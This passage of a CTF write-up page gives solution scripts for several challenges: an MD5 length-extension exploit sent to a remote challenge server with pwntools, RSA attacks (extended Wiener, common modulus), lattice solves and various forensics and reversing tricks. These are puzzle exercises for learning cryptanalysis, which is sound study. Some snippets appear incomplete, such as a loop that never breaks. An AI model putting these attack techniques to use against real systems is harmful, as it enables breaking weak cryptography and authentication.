0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391)
F = lambda x, y, z: ((x &amp; y) | ((~x) &amp; z))
G = lambda x, y, z: ((x &amp; z) | (y &amp; (~z)))
H = lambda x, y, z: (x ^ y ^ z)
I = lambda x, y, z: (y ^ (x | (~z)))
L = lambda x, n: ((x &lt;&lt; n) | (x &gt;&gt; (32 - n))) &amp; 0xffffffff
W = lambda i4, i3, i2, i1: (i1 &lt;&lt; 24) | (i2 &lt;&lt; 16) | (i3 &lt;&lt; 8) | i4
ascii_list = list(map(lambda x: x, message))
msg_length = len(ascii_list) * 8 + 512
ascii_list.append(128)
while (len(ascii_list) * 8 + 64) % 512 != 0:
ascii_list.append(1)
for i in range(8):
ascii_list.append((msg_length &gt;&gt; (8 * i)) &amp; 0xff)
for i in range(len(ascii_list) // 64):
a, b, c, d = h0, h1, h2, h3
for j in range(64):
if 0 &lt;= j &lt;= 15:
f = F(b, c, d) &amp; 0xffffffff
g = j
elif 16 &lt;= j &lt;= 31:
f = G(b, c, d) &amp; 0xffffffff
g = ((5 * j) + 1) % 16
elif 32 &lt;= j &lt;= 47:
f = H(b, c, d) &amp; 0xffffffff
g = ((3 * j) + 5) % 16
else:
f = I(b, c, d) &amp; 0xffffffff
g = (7 * j) % 16
aa, dd, cc = d, c, b
s = i * 64 + g * 4
w = W(ascii_list[s], ascii_list[s + 1], ascii_list[s + 2], ascii_list[s + 3])
bb = (L((a + f + K[j] + w) &amp; 0xffffffff, R[j]) + b) &amp; 0xffffffff
a, b, c, d = aa, bb, cc, dd
h0 = (h0 + a) &amp; 0xffffffff
h1 = (h1 + b) &amp; 0xffffffff
h2 = (h2 + c) &amp; 0xffffffff
h3 = (h3 + d) &amp; 0xffffffff
h0, h1, h2, h3 = reverse(h0), reverse(h1), reverse(h2), reverse(h3)
digest = (h0 &lt;&lt; 96) | (h1 &lt;&lt; 64) | (h2 &lt;&lt; 32) | h3
return hex(digest)[2:].rjust(32, '0'),ascii_list
from pwn import*
import string
from pwnlib.util.iters import mbruteforce
from hashlib import*
table = string.ascii_letters+string.digits
io = remote("39.106.48.123",39628)
def pow1():
io.recvuntil(b'XXXX+')
suffix = io.recv(16).decode("utf8")
io.recvuntil(b'== ')
cipher = io.recvline().strip().decode("utf8")
proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==
cipher, table, length=4, method='fixed')
io.sendlineafter(b'XXXX :', proof.encode())
return cipher
pow1()
io.recvuntil(b'Thing:')
GreatThing = io.recv(16)
from Crypto.Util.number import*
io.recvuntil(b'REATTHING:')
Md00 = io.recv(32)
H = md5ex(Md00.decode(),GreatThing)[0].encode()
for i in range(1,26):
Pad = Md00Plus(i*b'a')[1][i:]
MSG = bytes(Pad) + GreatThing
s = hex(bytes_to_long(MSG))[2:].encode()+b','+ hex(bytes_to_long(H))[2:].encode()
io.sendline(s)
print(i,io.recv())
msg = io.recv()
if b'flag' in msg:
print(msg)
break
io.interactive()
</code></pre>
<h2 id="tea_签到题"><a class="header" href="#tea_签到题">tea_签到题</a></h2>
<pre><code class="language-js">/******************************************
Use: "Hello World!".encrypt("key")
=&gt; "íSjÝqTÂWÕã”Aa[UÄ"
******************************************/
String.prototype.encrypt = function(password) {
const v = new Array(2);
const k = new Array(4);
let s = "";
var i;
plaintext = escape(this); // use escape() so only have single-byte chars to encode
// build key directly from 1st 16 chars of password
for (var i = 0; i &lt; 4; i++) k[i] = Str4ToLong(password.slice(i * 4, (i + 1) * 4));
for (i = 0; i &lt; plaintext.length; i += 8) { // encode plaintext into s in 64-bit (8 char) blocks
v[0] = Str4ToLong(plaintext.slice(i, i + 4)); // ... note this is 'electronic codebook' mode
v[1] = Str4ToLong(plaintext.slice(i + 4, i + 8));
code(v, k);
s += LongToStr4(v[0]) + LongToStr4(v[1]);
}
return escCtrlCh(s);
// note: if plaintext or password are passed as string objects, rather than strings, this
// function will throw an 'Object doesn't support this property or method' error
}
// Like C code
function code(v, k) {
// Extended TEA: this is the 1997 revised version of Needham &amp; Wheeler's algorithm
// params: v[2] 64-bit value block; k[4] 128-bit key
let y = v[0];
let z = v[1];
const delta = 0x9E3779B9;
const limit = delta * 32;
let sum = 0;
while (sum != limit) {
y += (z &lt;&lt; 4 ^ z &gt;&gt;&gt; 5) + z ^ sum + k[sum &amp; 3];
sum += delta;
z += (y &lt;&lt; 4 ^ y &gt;&gt;&gt; 5) + y ^ sum + k[sum &gt;&gt;&gt; 11 &amp; 3];
// note: unsigned right-shift '&gt;&gt;&gt;' is used in place of original '&gt;&gt;', due to lack
// of 'unsigned' type declaration in JavaScript (thanks to Karsten Kraus for this)
}
v[0] = y;
v[1] = z;
}
// supporting functions
function Str4ToLong(s) { // convert 4 chars of s to a numeric long
let v = 0;
for (let i = 0; i &lt; 4; i++) v |= s.charCodeAt(i) &lt;&lt; i * 8;
return isNaN(v) ? 0 : v;
}
function LongToStr4(v) { // convert a numeric long to 4 char string
const s = String.fromCharCode(v &amp; 0xFF, v &gt;&gt; 8 &amp; 0xFF, v &gt;&gt; 16 &amp; 0xFF, v &gt;&gt; 24 &amp; 0xFF);
return s;
}
function escCtrlCh(str) { // escape control chars which might cause problems with encrypted texts
return str.replace(/[\0\t\n\v\f\r\xa0'"!]/g, c =&gt; `!${c.charCodeAt(0)}!`);
}
function unescCtrlCh(str) { // unescape potentially problematic nulls and control characters
return str.replace(/!\d\d?\d?!/g, c =&gt; String.fromCharCode(c.slice(1, -1)));
}
// module.exports = (text, password) =&gt; text.encrypt(password);
/******************************************
Use: "íSjÝqTÂWÕã”Aa[UÄ".decrypt("key")
=&gt; "Hello World!"
******************************************/
String.prototype.decrypt = function(password) {
const v = new Array(2);
const k = new Array(4);
let s = "";
var i;
for (var i = 0; i &lt; 4; i++) k[i] = Str4ToLong(password.slice(i * 4, (i + 1) * 4));
ciphertext = unescCtrlCh(this);
for (i = 0; i &lt; ciphertext.length; i += 8) { // decode ciphertext into s in 64-bit (8 char) blocks
v[0] = Str4ToLong(ciphertext.slice(i, i + 4));
v[1] = Str4ToLong(ciphertext.slice(i + 4, i + 8));
decode(v, k);
s += LongToStr4(v[0]) + LongToStr4(v[1]);
}
// strip trailing null chars resulting from filling 4-char blocks:
s = s.replace(/\0+$/, '');
return unescape(s);
};
// Like C code
function decode(v, k) {
let y = v[0];
let z = v[1];
const delta = 0x9E3779B9;
let sum = delta * 32;
while (sum != 0) {
z -= (y &lt;&lt; 4 ^ y &gt;&gt;&gt; 5) + y ^ sum + k[sum &gt;&gt;&gt; 11 &amp; 3];
sum -= delta;
y -= (z &lt;&lt; 4 ^ z &gt;&gt;&gt; 5) + z ^ sum + k[sum &amp; 3];
}
v[0] = y;
v[1] = z;
}
// supporting functions
function Str4ToLong(s) { // convert 4 chars of s to a numeric long
let v = 0;
for (let i = 0; i &lt; 4; i++) v |= s.charCodeAt(i) &lt;&lt; i * 8;
return isNaN(v) ? 0 : v;
}
function LongToStr4(v) { // convert a numeric long to 4 char string
const s = String.fromCharCode(v &amp; 0xFF, v &gt;&gt; 8 &amp; 0xFF, v &gt;&gt; 16 &amp; 0xFF, v &gt;&gt; 24 &amp; 0xFF);
return s;
}
function escCtrlCh(str) { // escape control chars which might cause problems with encrypted texts
return str.replace(/[\0\t\n\v\f\r\xa0'"!]/g, c =&gt; `!${c.charCodeAt(0)}!`);
}
function unescCtrlCh(str) { // unescape potentially problematic nulls and control characters
return str.replace(/!\d\d?\d?!/g, c =&gt; String.fromCharCode(c.slice(1, -1)));
}
// module.exports = (text, password) =&gt; text.decrypt(password);
let text = "flag{demo}"
let entext = text.encrypt("123321")
let detext = entext.decrypt("123321")
console.log(detext);
</code></pre>
<h2 id="simple"><a class="header" href="#simple">simple</a></h2>
<pre><code class="language-python">#**Task
# task.py
from Crypto.Util.number import *
import gmpy2
import random
def get_extend():
while True:
d = random.randint(2**680,2**730)
if isPrime(d):
e = gmpy2.invert(d,lcm)
return e
#731
flag = b"flag{xxxxxxxxxxx}"
m = bytes_to_long(flag)
e = 65537
p = getPrime(1024)
q = getPrime(1024)
lcm = gmpy2.lcm(p-1,q-1)
n = p*q
c = pow(m,e,n)
e1 = get_extend()
e2 = get_extend()
print("e1 =",e1)
print("e2 =",e2)
print("c =",c)
print("n =",n)
#e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
#e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
#c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
#n = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607
#***Solution
# exp.sage
from sage.all import *
from Crypto.Util.number import *
from Crypto.Cipher import DES
import gmpy2
from Crypto.Util.number import *
from gmpy2 import invert
# USE extending wiener attack
e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
N = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607
a = 0.356 # 731./2049
M1 = N ** 0.5
M2 = N ** (a + 1)
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
M = matrix(ZZ, [[1, -N, 0, N ** 2], [0, e1, -e1, -e1 * N], [0, 0, e2, -e2 * N], [0, 0, 0, e1 * e2]]) * D
L = M.LLL()
t = vector(ZZ, L[0])
x = t * M ** (-1)
phi = int(x[1] / x[0] * e1)
d = invert(0x10001, phi)
m = pow(c, d, N)
print(long_to_bytes(m))
'''
pip install pycryptodome
pip install gmpy2
sage --pip install gmpy2
sage exp.sage
'''
# b'flag{d30488dc-ed10-4f09-aebb-5c049436d250}'
</code></pre>
<h2 id="-1"><a class="header" href="#-1"></a></h2>
<pre><code class="language-python">#***Task.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import random
from Crypto.Util.number import bytes_to_long
# from secret import FLAG
FLAG = b"flag{123}"
assert FLAG.startswith(b'flag{') and FLAG.endswith(b'}')
q = 210767327475911131359308665806489575328083
flag_bin = bin(bytes_to_long(FLAG[5:-1]))[2:]
l = len(flag_bin) #len("1100010011001000110011")
print(l)
print(bin(bytes_to_long(FLAG[5:-1]))) #0b1100010011001000110011
n = random.randint(l, 2*l) #randint(22, 22*2)
print(n) #24
cipher = []
for _ in range(n): #range(0,24,1)
r = [random.randint(2, q-2) for _ in range(l)]#range(22) randint(2, 210767327475911131359308665806489575328081)
# print(r)
s = 1
for i in range(l):#range(22)
s = s * r[i] ** int(flag_bin[i]) % q
cipher.append([r, s])
with open('new_output.txt', 'w') as f:
f.write(str(cipher))
</code></pre>
<pre><code class="language-python">#exp.py
from Crypto.Util.number import *
from sage.all import *
def add(a,p):
if pow(a,(p-1)//2,p)==1:
return 1
else:
return 0
f=open('output.txt','rb')
q = 210767327475911131359308665806489575328083
out=eval(f.read())
A=Matrix(GF(2),len(out))
v=vector(GF(2),len(out))
for i in range(len(out)):
t1,t2=out[i]
for j in range(len(t1)):
A[i,j]=add(t1[j],q)
v[i]=add(t2,q)+1
m=A.solve_right(v)
m=''.join(map(str,m))
print(long_to_bytes(int(m,2)))
</code></pre>
<h2 id="nono"><a class="header" href="#nono">NONO</a></h2>
<pre><code class="language-python">import base64
import re
# 填出来的数织答案
v27 ="0000000000000000000000000000000010000000000000000001110000000000000000111110000000000000111111110000000000011111111100000000001111111111100000000000111111100000000000000000000000000111111111111110000011100000000011110000111000000000111111100111111111111111000000000000000000000000000000111111100000000000001111111000000000000111111110000000000001111111000000000000000000000000000000000000000000000000"
# 得到flagflag{UDnkDgD2HEPlFEXlF8uyHPBHFEEnD8NTDPr3j85THDP+jKD=}
##
# 按照0或1的连续⻓度进⾏压缩
tmpl = re.findall(r'0+|1+', v27)
v24 = bytes([len(x) for x in tmpl])
# 拿到base64的新表
unk_403040 = [0x0C, 0xFF, 0xFF, 0xFF, 0x22, 0x2C, 0x25, 0x05, 0x1E, 0x1F, 0x34, 0x1D,
0x39, 0x30, 0x15, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2B, 0x14, 0x2D, 0x00,
0x10, 0x02, 0x11, 0x03, 0x37, 0x29, 0x33, 0x3B, 0x2E, 0x24, 0x2F, 0x20, 0x0A, 0x3D,
0x3F, 0x07, 0x08, 0x17, 0x0D, 0x28, 0x27, 0x26, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x35, 0x2A, 0x3A, 0x13, 0x18, 0x3E, 0x31, 0x38, 0x21, 0x01, 0x12, 0x0B, 0x32, 0x04,
0x06, 0x19, 0x09, 0x3C, 0x1B, 0x0E, 0x1C, 0x36, 0x0F, 0x16, 0x1A, 0x23]
mytable = [0 for _ in range(64)]
for x in unk_403040:
if x != 0xFF:
mytable[x] = chr(unk_403040.index(x)+43)
mytable = ''.join(mytable)
# 换表encode
b64table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
s = base64.b64encode(v24)
flag = "flag{" + s.decode().translate(str.maketrans(b64table, mytable)) + "}"
print(flag)
</code></pre>
<h2 id="kaokaoni"><a class="header" href="#kaokaoni">kaokaoni</a></h2>
<pre><code class="language-python">a = [[8, 2, 22, 97, 38, 15, 0, 40, 0, 75, 4, 5, 7, 78, 52, 12, 50, 77, 91, 8],
[49, 49, 99, 40, 17, 81, 18, 57, 60, 87, 17, 40, 98, 43, 69, 48, 4, 56, 62, 0],
[81, 49, 31, 73, 55, 79, 14, 29, 93, 71, 40, 67, 53, 88, 30, 3, 49, 13, 36, 65],
[52, 70, 95, 23, 4, 60, 11, 42, 69, 24, 68, 56, 1, 32, 56, 71, 37, 2, 36, 91],
[22, 31, 16, 71, 51, 67, 63, 89, 41, 92, 36, 54, 22, 40, 40, 28, 66, 33, 13, 80],
[24, 47, 32, 60, 99, 3, 45, 2, 44, 75, 33, 53, 78, 36, 84, 20, 35, 17, 12, 50],
[32, 98, 81, 28, 64, 23, 67, 10, 26, 38, 40, 67, 59, 54, 70, 66, 18, 38, 64, 70],
[67, 26, 20, 68, 2, 62, 12, 20, 95, 63, 94, 39, 63, 8, 40, 91, 66, 49, 94, 21],
[24, 55, 58, 5, 66, 73, 99, 26, 97, 17, 78, 78, 96, 83, 14, 88, 34, 89, 63, 72],
[21, 36, 23, 9, 75, 0, 76, 44, 20, 45, 35, 14, 0, 61, 33, 97, 34, 31, 33, 95],
[78, 17, 53, 28, 22, 75, 31, 67, 15, 94, 3, 80, 4, 62, 16, 14, 9, 53, 56, 92],
[16, 39, 5, 42, 96, 35, 31, 47, 55, 58, 88, 24, 0, 17, 54, 24, 36, 29, 85, 57],
[86, 56, 0, 48, 35, 71, 89, 7, 5, 44, 44, 37, 44, 60, 21, 58, 51, 54, 17, 58],
[19, 8, 81, 68, 5, 94, 47, 69, 28, 73, 92, 13, 86, 52, 17, 77, 4, 89, 55, 40],
[4, 52, 8, 83, 97, 35, 99, 16, 7, 97, 57, 32, 16, 26, 26, 79, 33, 27, 98, 66],
[88, 36, 68, 87, 57, 62, 20, 72, 3, 46, 33, 67, 46, 55, 12, 32, 63, 93, 53, 69],
[4, 42, 16, 73, 38, 25, 39, 11, 24, 94, 72, 18, 8, 46, 29, 32, 40, 62, 76, 36],
[20, 69, 36, 41, 72, 30, 23, 88, 34, 62, 99, 69, 82, 67, 59, 85, 74, 4, 36, 16],
[20, 73, 35, 29, 78, 31, 90, 1, 74, 31, 49, 71, 48, 86, 81, 16, 23, 57, 5, 54],
[1, 70, 54, 71, 83, 51, 54, 69, 16, 92, 33, 48, 61, 43, 52, 1, 89, 19, 67, 48]]
aa = [[]for i in range(4)]
for j in range(20):
for i in range(17):
aa[0].append(a[j][i]*a[j][i+1]*a[j][i+2]*a[j][i+3])
aa[1].append(a[i][j]*a[i+1][j]*a[i+2][j]*a[i+3][j])
for i in range(17):
for j in range(17):
aa[2].append(a[i][j]*a[i+1][j+1]*a[i+2][j+2]*a[i+3][j+3])
aa[3].append(a[i+3][j]*a[i+2][j+1]*a[i+1][j+2]*a[i][j+3])
for i in range(len(aa)):
print(max(aa[i]))
</code></pre>
<h2 id="ezflow"><a class="header" href="#ezflow">ezflow</a></h2>
<pre><code class="language-sh">#open in wireshark
#export zinfile from pcap
#find zip password from pcap data ,filter all sql timeout injection
#unzip file by password can get flag
</code></pre>
<p>task.py</p>
<pre><code class="language-python">from Crypto.Util.number import *
from flag import *
m = bytes_to_long(flag)
n = 2748281443944427868843369402621263042158244258427433547653329234844505048333691189629107146775166551897070384880309396022510445087966911639388490862151
e1 = 65537
e2 = 992923
c1 = pow(m,e1,n)
c2 = pow(m,e2,n)
#c1 = 285685918239736826397269350382490971822513853503791279402545608976504614743806744945079572548121135341824742716166350238418142063969240075997981863636
#c2 = 129273488481770576836913112982915335157542027932363877138157510043383503149178933085861517442700435060934412452576721945085276483980455830616742529117
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">#give e1,e2,c1,c2,n
#find m
import gmpy2
from Crypto.Util.number import long_to_bytes,bytes_to_long
n = 2748281443944427868843369402621263042158244258427433547653329234844505048333691189629107146775166551897070384880309396022510445087966911639388490862151
e1 = 65537
e2 = 992923
c1 = 285685918239736826397269350382490971822513853503791279402545608976504614743806744945079572548121135341824742716166350238418142063969240075997981863636
c2 = 129273488481770576836913112982915335157542027932363877138157510043383503149178933085861517442700435060934412452576721945085276483980455830616742529117
_, r, s = gmpy2.gcdext(e1, e2)
m = gmpy2.powmod(c1, r, n) * gmpy2.powmod(c2, s, n) % n
print(long_to_bytes(m))
</code></pre>
<h2 id="checkin"><a class="header" href="#checkin">checkin</a></h2>
<pre><code class="language-sh">#GY3DMYZWGE3DON3CGQZTGNZUGY2WMNJXGZTDOMRTGE3DINLGGQ4TGNJVMY2TGMZQGVTDINRXGU3GKNTFG44TKZRUHA3GMNZQGMZTKZRVHEZTANZVGVTDIYZWHE3GENRVGVTDGMJXGQ3WI
open cryberChef aoto decode
</code></pre>
<h2 id="capture-radiate-chart"><a class="header" href="#capture-radiate-chart">Capture Radiate Chart</a></h2>
<p>get_rar.py</p>
<pre><code class="language-python">data = open('alien.png','rb').read()
flag = ''
pos = data.index(b'IDAT')
data = data[pos+5:]
while 1:
try:
pos = data.index(b'IDAT')
flag += str(hex(data[pos-5])[2:].zfill(2))
data = data[pos+5:]
except:
f1 = open('out.rar','w')
f1.write(flag)
</code></pre>
<h2 id="iloveyou"><a class="header" href="#iloveyou">ILOVEYOU</a></h2>
<p><img src="../../img_list/image20230604014025638.png" alt="image-20230604014025638" /></p>
<pre><code class="language-sh"># open http://www.cmd5.com/ decode find flag
</code></pre>
<h2 id="bobs-enc"><a class="header" href="#bobs-enc">bobs enc</a></h2>
<p>task.py</p>
<pre><code class="language-python">from secret import *
import random
prime = 2141
print len(flag)
flag = map(ord,flag)
flag1 = flag[:21]
flag2 = flag[21:]
row = 64
def add(msg1,msg2):
return [(x+y)%prime for x,y in zip(msg1,msg2)]
def multi(msg1,msg2):
out = []
for l in msg1:
s = 0
for x,y in zip(l,msg2):
s += (x*y)%prime
s %= prime
out.append(s)
return out
def genkey(leng):
l = [[] for i in range(row)]
for x in range(row):
for i in range(leng):
l[x].append(random.randint(0,511))
return l
key = genkey(len(flag1))
print key
cipher1 = multi(key,flag1)
print cipher1
cipher2 = multi(key,flag2)
noise = [random.randint(0,6) for i in range(row)]
print add(noise,cipher2)
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">from sage.all import *
from sage.modules.free_module_integer import IntegerLattice
from random import randint
import sys
from itertools import starmap
from operator import mul
with open('out', 'r') as f:
key = eval(f.readline())
c1 = eval(f.readline())
c2 = eval(f.readline())
prime = 2141
K = matrix(Zmod(prime), key[:21])
C1 = vector(Zmod(prime), c1[:21])
m1 = K.inverse() * C1
flag = ''
for i in m1:
flag += chr(i)
print(flag)
# Babai's Nearest Plane algorithm
def Babai_closest_vector(M, G, target):
small = target
for _ in range(5):
for i in reversed(range(M.nrows())):
c = ((small * G[i]) / (G[i] * G[i])).round()
small -= M[i] * c
return target - small
m = 64
n = 21
q = prime
A_values = key
b_values = c2
A = matrix(ZZ, m + n, m)
for i in range(m):
A[i, i] = q
for x in range(m):
for y in range(n):
A[m + y, x] = A_values[x][y]
lattice = IntegerLattice(A, lll_reduce=True)
# print("LLL done")
gram = lattice.reduced_basis.gram_schmidt()[0]
target = vector(ZZ, b_values)
res = Babai_closest_vector(lattice.reduced_basis, gram, target)
# print("Closest Vector: {}".format(res))
R = IntegerModRing(q)
M = Matrix(R, A_values)
ingredients = M.solve_right(res)
# print("Ingredients: {}".format(ingredients))
for i in ingredients:
flag += chr(i)
print(flag)
</code></pre>
<pre><code class="language-sh">#get flag
sage exp.py
</code></pre>
<h2 id="babyqmk"><a class="header" href="#babyqmk">babyqmk</a></h2>
<pre><code class="language-python">SEED = 0
KC_A = 4
KC_Z = 29
KC_1 = 30
KC_9 = 38
KC_0 = 39
def rand():
global SEED
SEED = 214013 * SEED + 2531011
return (SEED &gt;&gt; 16) &amp; 0x7fff
keycodeToKey = {0:'KC_NO', 1:'KC_TRANSPARENT', 2:'KC_POST_FAIL', 3:'KC_UNDEFINED',
4:'KC_A', 5:'KC_B', 6:'KC_C', 7:'KC_D', 8:'KC_E', 9:'KC_F', 10:'KC_G', 11:'KC_H',
12:'KC_I', 13:'KC_J', 14:'KC_K', 15:'KC_L', 16:'KC_M', 17:'KC_N', 18:'KC_O', 19:'KC_P',
20:'KC_Q', 21:'KC_R', 22:'KC_S', 23:'KC_T', 24:'KC_U', 25:'KC_V', 26:'KC_W', 27:'KC_X',
28:'KC_Y', 29:'KC_Z', 30:'KC_1', 31:'KC_2', 32:'KC_3', 33:'KC_4', 34:'KC_5', 35:'KC_6',
36:'KC_7', 37:'KC_8', 38:'KC_9', 39:'KC_0', 40:'KC_ENTER', 41:'KC_ESCAPE',
42:'KC_BACKSPACE', 43:'KC_TAB', 44:'KC_SPACE', 45:'KC_MINUS', 46:'KC_EQUAL',
47:'KC_LEFT_BRACKET', 48:'KC_RIGHT_BRACKET', 49:'KC_BACKSLASH', 50:'KC_NONUS_HASH',
51:'KC_SEMICOLON', 52:'KC_QUOTE', 53:'KC_GRAVE', 54:'KC_COMMA', 55:'KC_DOT',
56:'KC_SLASH', 57:'KC_CAPS_LOCK', 58:'KC_F1', 59:'KC_F2', 60:'KC_F3', 61:'KC_F4',
62:'KC_F5', 63:'KC_F6', 64:'KC_F7', 65:'KC_F8', 66:'KC_F9', 67:'KC_F10', 68:'KC_F11',
69:'KC_F12', 70:'KC_PRINT_SCREEN', 71:'KC_SCROLL_LOCK', 72:'KC_PAUSE', 73:'KC_INSERT',
74:'KC_HOME', 75:'KC_PAGE_UP', 76:'KC_DELETE', 77:'KC_END', 78:'KC_PAGE_DOWN',
79:'KC_RIGHT', 80:'KC_LEFT', 81:'KC_DOWN', 82:'KC_UP', 83:'KC_NUM_LOCK',
84:'KC_KP_SLASH', 85:'KC_KP_ASTERISK', 86:'KC_KP_MINUS', 87:'KC_KP_PLUS',
88:'KC_KP_ENTER', 89:'KC_KP_1', 90:'KC_KP_2', 91:'KC_KP_3', 92:'KC_KP_4', 93:'KC_KP_5',
94:'KC_KP_6', 95:'KC_KP_7', 96:'KC_KP_8', 97:'KC_KP_9', 98:'KC_KP_0', 99:'KC_KP_DOT',
100:'KC_NONUS_BACKSLASH', 101:'KC_APPLICATION', 102:'KC_KB_POWER', 103:'KC_KP_EQUAL',
104:'KC_F13', 105:'KC_F14', 106:'KC_F15', 107:'KC_F16', 108:'KC_F17', 109:'KC_F18',
110:'KC_F19', 111:'KC_F20', 112:'KC_F21', 113:'KC_F22', 114:'KC_F23', 115:'KC_F24',
116:'KC_EXECUTE', 117:'KC_HELP', 118:'KC_MENU', 119:'KC_SELECT', 120:'KC_STOP',
121:'KC_AGAIN', 122:'KC_UNDO', 123:'KC_CUT', 124:'KC_COPY', 125:'KC_PASTE',
126:'KC_FIND', 127:'KC_KB_MUTE', 128:'KC_KB_VOLUME_UP', 129:'KC_KB_VOLUME_DOWN',
130:'KC_LOCKING_CAPS_LOCK', 131:'KC_LOCKING_NUM_LOCK', 132:'KC_LOCKING_SCROLL_LOCK',
133:'KC_KP_COMMA', 134:'KC_KP_EQUAL_AS400', 135:'KC_INTERNATIONAL_1',
136:'KC_INTERNATIONAL_2', 137:'KC_INTERNATIONAL_3', 138:'KC_INTERNATIONAL_4',
139:'KC_INTERNATIONAL_5', 140:'KC_INTERNATIONAL_6', 141:'KC_INTERNATIONAL_7',
142:'KC_INTERNATIONAL_8', 143:'KC_INTERNATIONAL_9', 144:'KC_LANGUAGE_1',
145:'KC_LANGUAGE_2', 146:'KC_LANGUAGE_3', 147:'KC_LANGUAGE_4', 148:'KC_LANGUAGE_5',
149:'KC_LANGUAGE_6', 150:'KC_LANGUAGE_7', 151:'KC_LANGUAGE_8', 152:'KC_LANGUAGE_9',
153:'KC_ALTERNATE_ERASE', 154:'KC_SYSTEM_REQUEST', 155:'KC_CANCEL', 156:'KC_CLEAR',
157:'KC_PRIOR', 158:'KC_RETURN', 159:'KC_SEPARATOR', 160:'KC_OUT', 161:'KC_OPER',
162:'KC_CLEAR_AGAIN', 163:'KC_CRSEL', 164:'KC_EXSEL', 224:'KC_LEFT_CTRL',
225:'KC_LEFT_SHIFT', 226:'KC_LEFT_ALT', 227:'KC_LEFT_GUI', 228:'KC_RIGHT_CTRL',
229:'KC_RIGHT_SHIFT', 230:'KC_RIGHT_ALT', 231:'KC_RIGHT_GUI'}
keymaps = [0x0029, 0x0000, 0x003A, 0x003B, 0x003C, 0x003D, 0x0000, 0x003E,
0x003F, 0x0040, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046,
0x0047, 0x0048, 0x0035, 0x001E, 0x001F, 0x0020, 0x0021, 0x0022,
0x0023, 0x0024, 0x0025, 0x0026, 0x0027, 0x002D, 0x002E, 0x002A,
0x0000, 0x0049, 0x004A, 0x004B, 0x002B, 0x0000, 0x0014, 0x001A,
0x0008, 0x0015, 0x0017, 0x001C, 0x0018, 0x000C, 0x0012, 0x0013,
0x002F, 0x0030, 0x0031, 0x004C, 0x004D, 0x004E, 0x0039, 0x0000,
0x0004, 0x0016, 0x0007, 0x0009, 0x000A, 0x000B, 0x000D, 0x000E,
0x000F, 0x0033, 0x0034, 0x0028, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x00E1, 0x001D, 0x001B, 0x0006, 0x0019, 0x0005, 0x0011,
0x0010, 0x0036, 0x0037, 0x0038, 0x0000, 0x00E5, 0x0000, 0x0000,
0x0052, 0x0000, 0x00E0, 0x00E3, 0x0000, 0x00E2, 0x0000, 0x0000,
0x002C, 0x0000, 0x0000, 0x0000, 0x00E6, 0x00E7, 0x0000, 0x0065,
0x00E4, 0x0050, 0x0051, 0x004F, 0x0029, 0x0000, 0x003A, 0x003B,
